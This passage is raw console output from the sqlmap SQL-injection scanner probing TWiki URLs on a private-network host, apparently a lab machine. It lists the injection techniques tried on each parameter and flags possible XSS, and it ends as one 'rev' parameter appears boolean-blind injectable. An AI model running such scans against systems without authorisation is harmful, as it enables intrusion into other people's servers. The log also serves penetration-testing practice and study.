[20:13:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:13:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:13:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:13:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:13:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:13:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:13:46] [INFO] testing 'Oracle AND time-based blind' | |
[20:13:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:13:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:13:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:13:59] [WARNING] GET parameter 'rev1' is not injectable | |
[20:13:59] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:13:59] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[20:13:59] [INFO] GET parameter 'rev2' is dynamic | |
[20:13:59] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:13:59] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[20:13:59] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:13:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:14:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:14:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:14:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:14:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:14:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:14:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:14:04] [INFO] testing 'MySQL inline queries' | |
[20:14:04] [INFO] testing 'PostgreSQL inline queries' | |
[20:14:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:14:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:14:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:14:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:14:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:14:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:14:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:14:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:14:08] [INFO] testing 'Oracle AND time-based blind' | |
[20:14:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:14:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:14:21] [WARNING] GET parameter 'rev2' is not injectable | |
[20:14:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 178: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.17 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:14:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.17' | |
[20:14:21] [INFO] testing connection to the target URL | |
[20:14:21] [INFO] testing if the target URL is stable | |
[20:14:22] [INFO] target URL is stable | |
[20:14:22] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:14:22] [WARNING] GET parameter 'rev' does not appear dynamic | |
[20:14:22] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:14:22] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:14:22] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:14:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:14:22] [WARNING] reflective value(s) found and filtering out | |
[20:14:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:14:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:14:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:14:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:14:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:14:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:14:26] [INFO] testing 'MySQL inline queries' | |
[20:14:26] [INFO] testing 'PostgreSQL inline queries' | |
[20:14:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:14:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:14:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:14:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:14:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:14:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:14:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:14:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:14:30] [INFO] testing 'Oracle AND time-based blind' | |
[20:14:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:14:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:14:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:14:43] [WARNING] GET parameter 'rev' is not injectable | |
[20:14:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:14:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.17&rev2=1.16' | |
[20:14:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.16' | |
URL 179: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.18¶m2=1.18 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:14:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.18¶m2=1.18' | |
[20:14:43] [INFO] testing connection to the target URL | |
[20:14:43] [INFO] testing if the target URL is stable | |
[20:14:44] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:14:44] [INFO] testing if GET parameter 'template' is dynamic | |
[20:14:44] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:14:44] [INFO] GET parameter 'template' is dynamic | |
[20:14:44] [INFO] heuristics detected web page charset 'ascii' | |
[20:14:44] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:14:44] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:14:44] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:14:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:14:45] [WARNING] reflective value(s) found and filtering out | |
[20:14:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:14:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:14:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:14:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:14:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:14:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:14:47] [INFO] testing 'MySQL inline queries' | |
[20:14:47] [INFO] testing 'PostgreSQL inline queries' | |
[20:14:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:14:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:14:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:14:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:14:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:14:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:14:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:14:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:14:50] [INFO] testing 'Oracle AND time-based blind' | |
[20:14:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:14:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:14:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:15:00] [WARNING] GET parameter 'template' is not injectable | |
[20:15:00] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:15:00] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:15:00] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:15:00] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:15:00] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:15:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:15:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:15:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:15:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:15:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:15:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:15:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:15:05] [INFO] testing 'MySQL inline queries' | |
[20:15:05] [INFO] testing 'PostgreSQL inline queries' | |
[20:15:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:15:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:15:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:15:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:15:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:15:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:15:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:15:09] [INFO] testing 'Oracle AND time-based blind' | |
[20:15:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:15:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:15:24] [WARNING] GET parameter 'param1' is not injectable | |
[20:15:24] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:15:24] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:15:24] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:15:25] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:15:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:15:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:15:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:15:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:15:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:15:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:15:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:15:29] [INFO] testing 'MySQL inline queries' | |
[20:15:29] [INFO] testing 'PostgreSQL inline queries' | |
[20:15:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:15:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:15:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:15:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:15:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:15:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:15:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:15:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:15:33] [INFO] testing 'Oracle AND time-based blind' | |
[20:15:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:15:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:15:49] [WARNING] GET parameter 'param2' is not injectable | |
[20:15:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 180: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGuest?t=1441457786 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:15:49] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGuest?t=1441457786' | |
[20:15:49] [INFO] testing connection to the target URL | |
[20:15:49] [INFO] testing if the target URL is stable | |
[20:15:50] [INFO] target URL is stable | |
[20:15:50] [INFO] testing if GET parameter 't' is dynamic | |
[20:15:50] [WARNING] GET parameter 't' does not appear dynamic | |
[20:15:50] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:15:50] [INFO] testing for SQL injection on GET parameter 't' | |
[20:15:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:15:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:15:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:15:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:15:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:15:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:15:53] [INFO] testing 'MySQL inline queries' | |
[20:15:54] [INFO] testing 'PostgreSQL inline queries' | |
[20:15:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:15:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:15:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:15:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:15:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:15:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:15:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:15:57] [INFO] testing 'Oracle AND time-based blind' | |
[20:15:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:15:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:16:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:16:08] [WARNING] GET parameter 't' is not injectable | |
[20:16:08] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 181: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=TWiki *Guest[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:16:08] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=TWiki *Guest[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:16:08] [INFO] testing connection to the target URL | |
[20:16:09] [INFO] testing if the target URL is stable | |
[20:16:10] [INFO] target URL is stable | |
[20:16:10] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:16:10] [WARNING] URI parameter '#1*' does not appear dynamic | |
[20:16:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:16:10] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:16:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:16:10] [WARNING] reflective value(s) found and filtering out | |
[20:16:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:16:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:16:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:16:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:16:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:16:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:16:13] [INFO] testing 'MySQL inline queries' | |
[20:16:13] [INFO] testing 'PostgreSQL inline queries' | |
[20:16:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:16:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:16:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:16:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:16:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:16:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:16:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:16:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:16:17] [INFO] testing 'Oracle AND time-based blind' | |
[20:16:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:16:17] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:16:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:16:29] [WARNING] URI parameter '#1*' is not injectable | |
[20:16:29] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 182: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:16:29] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?skin=print' | |
[20:16:29] [INFO] testing connection to the target URL | |
[20:16:29] [INFO] testing if the target URL is stable | |
[20:16:30] [INFO] target URL is stable | |
[20:16:30] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:16:30] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:16:30] [INFO] GET parameter 'skin' is dynamic | |
[20:16:30] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:16:31] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:16:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:16:31] [INFO] heuristics detected web page charset 'ascii' | |
[20:16:31] [WARNING] reflective value(s) found and filtering out | |
[20:16:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:16:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:16:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:16:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:16:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:16:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:16:34] [INFO] testing 'MySQL inline queries' | |
[20:16:34] [INFO] testing 'PostgreSQL inline queries' | |
[20:16:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:16:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:16:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:16:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:16:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:16:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:16:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:16:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:16:37] [INFO] testing 'Oracle AND time-based blind' | |
[20:16:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:16:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:16:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:16:48] [WARNING] GET parameter 'skin' is not injectable | |
[20:16:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 183: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.6&rev2=1.5 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:16:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.6&rev2=1.5' | |
[20:16:48] [INFO] testing connection to the target URL | |
[20:16:48] [INFO] testing if the target URL is stable | |
[20:16:49] [INFO] target URL is stable | |
[20:16:49] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:16:49] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:16:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:16:49] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:16:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:16:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:16:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:16:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:16:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:16:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:16:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:16:53] [INFO] testing 'MySQL inline queries' | |
[20:16:53] [INFO] testing 'PostgreSQL inline queries' | |
[20:16:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:16:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:16:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:16:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:16:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:16:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:16:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:16:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:16:56] [INFO] testing 'Oracle AND time-based blind' | |
[20:16:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:16:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:17:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:17:09] [WARNING] GET parameter 'rev1' is not injectable | |
[20:17:09] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:17:09] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[20:17:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:17:09] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:17:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:17:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:17:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:17:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:17:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:17:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:17:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:17:13] [INFO] testing 'MySQL inline queries' | |
[20:17:13] [INFO] testing 'PostgreSQL inline queries' | |
[20:17:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:17:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:17:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:17:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:17:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:17:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:17:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:17:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:17:16] [INFO] testing 'Oracle AND time-based blind' | |
[20:17:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:17:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:17:29] [WARNING] GET parameter 'rev2' is not injectable | |
[20:17:29] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 184: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.5 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:17:29] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.5' | |
[20:17:29] [INFO] testing connection to the target URL | |
[20:17:29] [INFO] testing if the target URL is stable | |
[20:17:30] [INFO] target URL is stable | |
[20:17:30] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:17:30] [INFO] confirming that GET parameter 'rev' is dynamic | |
[20:17:30] [INFO] GET parameter 'rev' is dynamic | |
[20:17:30] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:17:30] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:17:30] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:17:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:17:30] [WARNING] reflective value(s) found and filtering out | |
[20:17:32] [INFO] GET parameter 'rev' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable | |
